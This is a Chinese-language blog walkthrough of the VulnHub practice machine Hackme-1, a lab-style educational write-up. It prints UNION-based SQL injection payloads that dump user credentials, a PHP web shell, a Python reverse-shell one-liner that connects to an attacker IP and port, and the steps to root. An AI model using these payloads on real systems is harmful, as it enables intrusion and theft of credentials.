<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="kting">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://ktkting.github.io/2024/12/18/hackme-1/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="題目   透過 Web 漏洞，獲得有限的權限訪問，並將自己提升為 root 權限  Step1 - Reconnaisance1sudo arp-scan -l     1sudo nmap -A -T4 靶機IP     1sudo dirsearch -u 靶機IP  會發現到一個 login.php 網頁    Step2 - Information Gathering上網搜尋 login.">
<meta property="og:type" content="article">
<meta property="og:title" content="Hackme-1">
<meta property="og:url" content="https://ktkting.github.io/2024/12/18/Hackme-1/index.html">
<meta property="og:site_name" content="ktkting">
<meta property="og:description" content="題目   透過 Web 漏洞，獲得有限的權限訪問，並將自己提升為 root 權限  Step1 - Reconnaisance1sudo arp-scan -l     1sudo nmap -A -T4 靶機IP     1sudo dirsearch -u 靶機IP  會發現到一個 login.php 網頁    Step2 - Information Gathering上網搜尋 login.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://hackmd.io/_uploads/Syq95S0Eyx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HkqocrRVkx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HJZOsS04Jg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/B1RoorA4ye.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SkZTiHAE1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyO1nBC4Jl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/BythnB0N1g.png">
<meta property="og:image" content="https://hackmd.io/_uploads/B1iRhr04kl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H12RaBANJx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rk6k0H0V1x.png">
<meta property="og:image" content="https://hackmd.io/_uploads/r12WRBC41e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ByU8yL0Vke.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HyllgUAV1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryrIZUCNJl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SkrfrL0N1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ry4VSL0NJl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HyodIUREye.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hy8I8IC4kl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1L288C4kg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hky7PLC4kx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1cxuICEyl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryN7O8REJg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/BkyLd8CEkx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ry62dUCEke.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1aLK8RNJe.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hk8puL0EJg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyxkY8RVyg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryTMKUCNkg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HJjJt8CNyg.png">
<meta property="article:published_time" content="2024-12-18T05:19:41.000Z">
<meta property="article:modified_time" content="2024-12-18T05:19:58.703Z">
<meta property="article:author" content="kting">
<meta property="article:tag" content="VulnHub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hackmd.io/_uploads/Syq95S0Eyx.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/file.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/file.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/file.png">
    <!--- Page Info-->
    
    <title>
        
            Hackme-1 -
        
        Ktkting&#39;s blog
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"ktkting.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":false,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推薦閱讀","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":true,"custom_message":"Ktkting's Blog"},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"dark":"/images/alena-aenami-budapest.jpg","light":"/images/alena-aenami-quiet-1px.jpg"},"title":"Welcome to my blog","subtitle":{"text":["Learning record","Life record"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.8rem","line_height":1},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/ktkting"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.7.1","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}}},"article_date_format":"YYYY-MM-DD","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Ktkting&#39;s Blog
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/file.png">
                </a>
            
            <a class="logo-title" href="/">
                
                Ktkting&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
                
                    
                    
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">4</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">10</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Hackme-1</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/github.png">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">kting</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-12-18 13:19:41</span>
        <span class="mobile">2024-12-18 13:19:41</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-12-18 13:19:58</span>
            <span class="mobile">2024-12-18 13:19:58</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/VulnHub/">VulnHub</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p><a class="link"   target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/hackme-1,330/" >題目 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<blockquote>
<p>透過 Web 漏洞，獲得有限的權限訪問，並將自己提升為 root 權限</p>
</blockquote>
<h3 id="Step1-Reconnaisance"><a href="#Step1-Reconnaisance" class="headerlink" title="Step1 - Reconnaisance"></a>Step1 - Reconnaisance</h3><div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo arp-scan -l</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Syq95S0Eyx.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -A -T4 靶機IP</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HkqocrRVkx.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo dirsearch -u 靶機IP</span><br></pre></td></tr></table></figure></div>

<p>會發現到一個 login.php 網頁<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HJZOsS04Jg.png"
                      alt="image"
                ></p>
<br>
<br>

<h3 id="Step2-Information-Gathering"><a href="#Step2-Information-Gathering" class="headerlink" title="Step2 - Information Gathering"></a>Step2 - Information Gathering</h3><p>上網搜尋 login.php，如下圖:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/B1RoorA4ye.png"
                      alt="image"
                ></p>
<br>

<p>註冊一個帳號密碼</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SkZTiHAE1e.png"
                      alt="image"
                ></p>
<br>

<p>登入帳號密碼</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SyO1nBC4Jl.png"
                      alt="image"
                ></p>
<br>

<p>會發現是一個類似圖書館的搜尋網站</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/BythnB0N1g.png"
                      alt="image"
                ></p>
<br>

<p>嘗試使用 sql 注入語法</p>
<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; or 1=1-- -</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/B1iRhr04kl.png"
                      alt="image"
                ></p>
<br>

<p>首先我們要先猜這張表有幾個<code>column</code>，透過 <code>UNION SELECT</code> 添加假造的查詢結果，並用<code> --</code> 註解掉後續程式碼，沒有結果</p>
<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select 1,2-- -</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/H12RaBANJx.png"
                      alt="image"
                ></p>
<br>

<p>有成功出現結果</p>
<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select 1,2,3-- -</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/rk6k0H0V1x.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select database(),2,3-- -</span></span><br></pre></td></tr></table></figure></div>

<p><code>database()</code> - 查看資料庫名</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/r12WRBC41e.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select group_concat(table_name),2,3 from information_schema.tables where table_schema-&#x27;</span>webapphacking<span class="string">&#x27;--</span></span><br></pre></td></tr></table></figure></div>

<p><code>group_concat()</code> - MySQL 能夠將<code>query</code>出來的結果以,形式隔開<br><code>information_schema.tables</code> - 是一個資料表，紀錄了資料庫中的所有資料表的相關資訊。<br><code>table_schema=&#39;webapphacking&#39;</code> - 只列出屬於名為 <code>webapphacking</code> 資料庫中的表名。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ByU8yL0Vke.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select group_concat(column_name),2,3 from information_schema.columns where table_name=&#x27;</span>users<span class="string">&#x27;-- -</span></span><br></pre></td></tr></table></figure></div>

<p><code>information_schema.columns</code> - 透過查詢這個表可以取得指定資料表的欄位列表<br><code>where table_name=&#39;users&#39;</code> - 限制查詢只取得名為 <code>users</code> 的資料表的欄位資訊</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HyllgUAV1e.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27; union select group_concat(user),group_concat(pasword),3 from users-- -</span></span><br></pre></td></tr></table></figure></div>

<p><code>group_concat(user)</code> - 將 <code>users</code> 資料表中 <code>user</code> 欄位的所有值以逗號串接起來，一次性取得所有使用者名稱。<br><code>group_concat(pasword)</code> - 同樣地，將 <code>pasword</code> 欄位所有值串接成字串。<br><code>from users</code> - 指定要從 users 資料表中取得資料。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ryrIZUCNJl.png"
                      alt="image"
                ></p>
<br>

<p>把帳號密碼羅列出來，如下圖:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SkrfrL0N1e.png"
                      alt="image"
                ></p>
<br>

<p>把<code>superadmin</code>的密碼進行解碼</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ry4VSL0NJl.png"
                      alt="image"
                ></p>
<br>

<p>將原本帳號登出，改成使用<code>superadmin</code>帳號密碼登入</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HyodIUREye.png"
                      alt="image"
                ></p>
<br>

<h3 id="Step3-Exploitation"><a href="#Step3-Exploitation" class="headerlink" title="Step3 - Exploitation"></a>Step3 - Exploitation</h3><p>創建一個<code>php</code>程式碼檔案</p>
<div class="highlight-container" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">system</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<p>1.<code>system()</code>函式會在伺服器端執行該字串指令，並將執行結果輸出回瀏覽器端顯示。 2. <code>$_GET[&#39;cmd&#39;]</code> 代表從 URL 查詢字串<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Hy8I8IC4kl.png"
                      alt="image"
                ></p>
<br>

<p>將 php 檔上傳，就可以在網址部分下指令</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/S1L288C4kg.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip a</span><br></pre></td></tr></table></figure></div>

<p>查詢本地端 IP<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Hky7PLC4kx.png"
                      alt="image"
                ></p>
<br>

<p>進行交互式 shell</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.196.134/uploads/file.php?cmd=python -c &#x27;import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((&quot;192.168.196.135&quot;,4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span><br></pre></td></tr></table></figure></div>

<p>並且打開<code>nc</code>監聽</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nlup 4444</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/H1cxuICEyl.png"
                      alt="image"
                ></p>
<br>

<p>透過下面指令，將指令環境變成 bash 環境</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ryN7O8REJg.png"
                      alt="image"
                ></p>
<br>

<h3 id="Step4-Privilege-Escalation"><a href="#Step4-Privilege-Escalation" class="headerlink" title="Step4 - Privilege Escalation"></a>Step4 - Privilege Escalation</h3><p>查看目前存在的用戶</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/passwd | grep bash</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/BkyLd8CEkx.png"
                      alt="image"
                ></p>
<br>

<p>會發現 home 下面有兩個資料夾</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /home</span><br><span class="line">ls</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ry62dUCEke.png"
                      alt="image"
                ></p>
<br>

<p>查看 hackme 資料夾底下有甚麼線索，如下圖:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/S1aLK8RNJe.png"
                      alt="image"
                ></p>
<br>

<p>查看 legacy 資料夾底下有甚麼線索，如下圖，會發現有一個<code>touhmenot</code>檔案</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Hk8puL0EJg.png"
                      alt="image"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SyxkY8RVyg.png"
                      alt="image"
                ></p>
<br>

<p>透過<code>file</code>指令知道<code>touhmenot</code>是一個執行檔</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ryTMKUCNkg.png"
                      alt="image"
                ></p>
<br>

<p>執行這個檔案，就成功將權限變成<code>root</code>了<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HJjJt8CNyg.png"
                      alt="image"
                ></p>
